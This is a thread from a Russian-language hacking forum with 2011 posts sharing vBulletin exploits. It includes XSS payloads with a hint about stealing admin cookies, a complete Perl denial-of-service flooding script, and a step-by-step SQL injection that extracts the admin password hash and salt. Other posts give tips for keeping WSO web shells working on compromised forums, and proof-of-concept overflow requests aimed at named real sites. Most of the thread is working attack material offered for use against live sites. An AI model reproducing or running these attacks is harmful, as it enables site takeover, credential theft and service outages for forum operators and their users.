HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #111  
Старый 19.08.2011, 07:25
-morfiy-
Новичок
Регистрация: 08.02.2010
Сообщений: 1
Провел на форуме:
54835

Репутация: 0
По умолчанию

vBulletin 4.0.0-4.0.2 YaAS (yet another award system) XSS Vulnerability

Код:
Code:
vBulletin 4.0.0-4.0.2 YaAS (yet another award system) XSS Vulnerability=======================================================================
vBulletin 4.0.0-4.0.2 YaAS (yet another award system) XSS Vulnerability
=======================================================================

# Exploit Title: vBulletin 4.0.0-4.0.2 YaAS 4.0.0 (yet another award system) XSS

# Date: 2010-05-13

# Author: Un-Dead

# Team: eX.ploit ( http://ex.ploit.net )

# Software Link: http://www.vbulletin.org/forum/showthread.php?t=232684&highlight=yet+another+award+system

# Google Dork: inurl: recommend_award.php?award_id=1

# Version: vBulletin 4.0.0 thru 4.0.2 using YaAS v4.0.0 (This has now been updated too 4.0.1 and does not work on the updated version)

# Tested on: Windows XP SP3, KDE3.5 vBulletin with HTML turned off

# Usage: XSS

# Code:

This will only work if the administrator has opted to set the ?recommend this award? to create a new poll somewhere in the forum (admin area is even better for cookie stealing J)

Again this will not work on the latest update of YaAS but it will work on YaAS 4.0.0

Click awards tab, chose recommend this award. In the member name just type something doesent really matter.

In the body put your xss

<script>alert(‘xss’);</script>

The infected page will be the poll that was created.

If the admin does not have the ?create new poll? enabled this eX.ploit is useless.

# Inj3ct0r.com [2010-05-13]var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}
 
Ответить с цитированием

  #112  
Старый 24.08.2011, 20:22
-morfiy-
Новичок
Регистрация: 08.02.2010
Сообщений: 1
Провел на форуме:
54835

Репутация: 0
По умолчанию

vBulletin 4.1.3pl3 / 4.1.4pl3 / 4.1.5pl1 Cross Site Scriptin

vBulletin 4.1.3pl3 / 4.1.4pl3 / 4.1.5pl1 Cross Site Scriptin

Posted on 04 August 2011

*Advisory Information* Title: vBulletin Cross Site Scripting Vulnerability Date published: 02-08-2011 Vendors contacted: vBulletin team *Vulnerability Information* Class: XSS flaw Vulnerable page: Admin Login Page (admincp) Remotely Exploitable: Yes Locally Exploitable: No *Vulnerability Description* vBulletin is a community forum solution for a wide range of users, including industry leading companies. A XSS vulnerability has been discovered that could allow an attacker to carry out an action impersonating a legal user, or to obtain access to a user's account. This flaw allows unauthorized disclosure and modification of information, and it allows disruption of service. *Vulnerable versions* 4.1.3pl3, 4.1.4pl3 & 4.1.5pl1 *Non-vulnerable Packages* . vBulletin prior to 4.1.3 *Vendor Information, Solutions and Workarounds* vBulletin team has released patches for this flaw and patch is released on 02-08-2011. https://www.vbulletin.com/forum/showthread.php/385133-vBulletin-4.1.3-4.1.4-and-4.1.5-Security-Patch *Credits* This vulnerability was discovered by Muhammad Haroon from Innovative Solutions KSA. OWASP Chapter Lead of Pakistan. haroon [at] live [dot] it *Proof of Concept Code* This is a Cross Site Scripting (XSS) vulnerability within vBulletin community forum solution. In order to exploit this flaw following vector would be used. http://www.example.com/forums/admincp/?">alert('Xss_found_By_M.Haroon') *Report Timeline* 30-07-2011: Notifies the vBulletin team about the vulnerability. 31-07-2011: vBulletin Team ask for technical description about the flaw 31-07-2011: Technical Details sent to vbulletin team 02-08-2011: vBulletin notifies that a fix has been produced and is available to the users on 2nd August 2011 03-08-2011: Vulnerability publicly disclosed.
 
Ответить с цитированием

  #113  
Старый 26.08.2011, 19:49
-morfiy-
Новичок
Регистрация: 08.02.2010
Сообщений: 1
Провел на форуме:
54835

Репутация: 0
По умолчанию

Если кому нужно, то вот так можно узнать версию форума:

http://xxxx.xxx/archive/archive.css ну или так:

http://xxxx.xxx/cpstyles/global.css

На самом деле вариантов много
 
Ответить с цитированием

  #114  
Старый 14.09.2011, 01:04
TYPUCT
Guest
Сообщений: n/a
Провел на форуме:
9412

Репутация: 0
По умолчанию

Цитата:
Сообщение от BLurpi^_^  
BLurpi^_^ said:
Для этого что то есть?
Ни это - http://www.exploit-db.com/exploits/17314/
Ни это - http://www.exploit-db.com/exploits/17555/
не работает
Проверка на работоспособность.

Код:
Code:
vBulletin 4.0.6 – Danial Of Service Exploit (redhat)====================================================
vBulletin 4.0.6 – Danial Of Service Exploit (redhat)
====================================================

################################################
Author : KnocKout
Thanks : DaiMon,BARCOD3
Contact : knockoutr@msn.com
Tested on : redhat
##############################################
##################vBulletin 4.0.6 – Danial Of Service Exploit for RedHat###############

#!/usr/bin/perl

use IO::Socket;

print "n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+n";
print "+ vBulletin 4.0.6 D.O.S Exploit(FOR redhat) +n";
print "+ Coded by KnocKout +n";
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+nn";
print "Host |without http://www.| ";
chomp($host = <STDIN>);
print "Path |example. /en or / | ";
chomp($pth = <STDIN>);
{
while($x != 999999)
{
$postit = "?t=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "nOffline! – We can not Connect To ‘$host’ it May be DoSedn" unless $sock;

print $sock "POST $pth/showthread.php HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n";
print $sock "Referer: $hostn";
print $sock "Accept-Language: en-usn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Accept-Encoding: gzip, deflaten";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4n";
print $sock "Connection: Keep-Aliven";
print $sock "Cache-Control: no-cachen";
print $sock "Content-Length: $lrgnn";
print $sock "$postitn";
close($sock);
syswrite STDOUT, "Attack Started ";
$x++;
}
}

# Inj3ct0r.com [2010-09-02]var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}
http://inj3ct0r.com/exploits/13952
 
Ответить с цитированием

  #115  
Старый 17.09.2011, 16:00
WTSBugzoff
Guest
Сообщений: n/a
Провел на форуме:
19272

Репутация: 0
По умолчанию

Уязвимость пашет на vBulletin 4.x.x

Заходим, регистрируемся (не всегда обязательно, если поиск без всяких там капч и вопросов от имени гостя проходит, то рега не впёрлась).

Запускаем лису, плагин liveHTTPHeaders.

Вбиваем в поле поиска любую лабуду, например "4234234" и жмём enter

В liveHTTPHeaders редактируем запрос таким вот образом, дописывая это:

Код:
Code:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
Отправляем запрос, выйдет ошибка Database error

Смотрим исходный код, внизу находим хэш, записываем

Теперь оправляем запрос на вывод соли, вот такой:

Код:
Code:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select salt from user where userid=1 and row(1,1)>(select count(*),concat( (select user.salt) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
Опять ошибка, опять смотрим исходный код, записываем соль.

Всё, осталось только расшифровать.

Иногда таблица не user называется, тогда хэш мы не увидим, а увидим на месте хэша какую-то лабуду, а чуть выше виден будет префикс, вот его и дописываем в наш запрос, и тогда всё бенч будет.
 
Ответить с цитированием

  #116  
Старый 30.09.2011, 19:42
Export
Новичок
Регистрация: 13.02.2010
Сообщений: 0
Провел на форуме:
3855

Репутация: 0
По умолчанию

Итак дорогие друзья хотелось бы поговорить с вами о шеллах в данном форуме. Сейчас вышел патч для форума и при попытке зайти на шелл через модуль вылазить сообщение:

Код:
Code:
Your submission could not be processed because a security token was missing.

If this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.
Какой-то Forum
Как решить:

1.Можно править шелл (использую WSO 2.5)

2. А можно=> Опера=> форум с шелом=> Исходный код=> После

Код:
Code:
value='>>'
всавить

Код:
Code:
accesskey="r" tabindex="1"
=> Нажать применить изменеия=> Вуаля! Рабочий шелл!

ПС может давно известно. Но для меня стало очень актуально и ново данное открыие

ПСС Открыл сам.
 
Ответить с цитированием

  #117  
Старый 30.09.2011, 21:46
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию

Цитата:
Сообщение от Export  
Export said:
Итак дорогие друзья хотелось бы поговорить с вами о шеллах в данном форуме. Сейчас вышел патч для форума и при попытке зайти на шелл через модуль вылазить сообщение:
Код:
Code:
Your submission could not be processed because a security token was missing.

If this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.
Какой-то Forum
.
Открою секрет: достаточно очистить кукисы админа и шелл нормально открывается
 
Ответить с цитированием

  #118  
Старый 02.11.2011, 21:39
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

[3.8.x] Cyb - Advanced Forum Statistics

[4.0.x] VSa - Advanced Forum Statistics


c 4 линейки название немного изменилось. был помидор, стал томат.

FULL PATH DISCLOSURE

(раскрытие путей)

Possible integer overflow

3.8.X

модуль cyb_topstats

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$resultsnr_lp[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$resultsnr[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]) +[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

[/
COLOR][/COLOR
4.0.X

Модуль vsa_topstats

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$vsacb_resnr_lp[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$vsacb_resnr[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]) +[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

[/
COLOR][/COLOR
PoC for 3.8.X:

Код:
Code:
POST /misc.php?do=cybstats HTTP/1.1
Host: brutezone.ru
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://brutezone.ru/misc.php?do=cybstats
Cookie: куки. нужна авторизация.
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

securitytoken=1320250782-fda4c39ad1983a01f3b3ce9b94b7350c35099352&resultsnr=999999999999999999999999999999999999
PoC for 4.0.X:

(на 4.1.X не пробовал.)

Код:
Code:
POST /misc.php?do=vsastats HTTP/1.1
Host: www.html.by
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://www.html.by/misc.php?do=vsastats
Cookie: куки. нужна авторизация.
Content-Type: application/x-www-form-urlencoded
Content-Length: 124

securitytoken=1320251249-9e5b6a09879833baf7af3e58fae882855e302814&vsacb_resnr=5999999999999999999999999999999999999999999999
 
Ответить с цитированием

  #119  
Старый 27.11.2011, 16:36
tabletkO
Guest
Сообщений: n/a
Провел на форуме:
28093

Репутация: 11
По умолчанию

Цитата:
Сообщение от SergioBlog  
SergioBlog said:
Нужна помощь в заливке шелла.
Создаю плагин с кодом шелла wso, пихаю его в faq_complete, но при выполнении какой-то команды или переходе в папку выдаёт:
Your submission could not be processed because a security token was missing.
If this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.
как можно решить эту проблему? Вариант с system($_GET["cmd"]); не подходит тк все функции для выполнения системных команд отключены.
Простo куки почисти, пройдет)
 
Ответить с цитированием

  #120  
Старый 11.12.2011, 16:46
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

[CENTER][SIZE="3"][COLOR="DarkOrange"]vBulletin
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости. Обсуждения. 18 26.01.2007 16:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ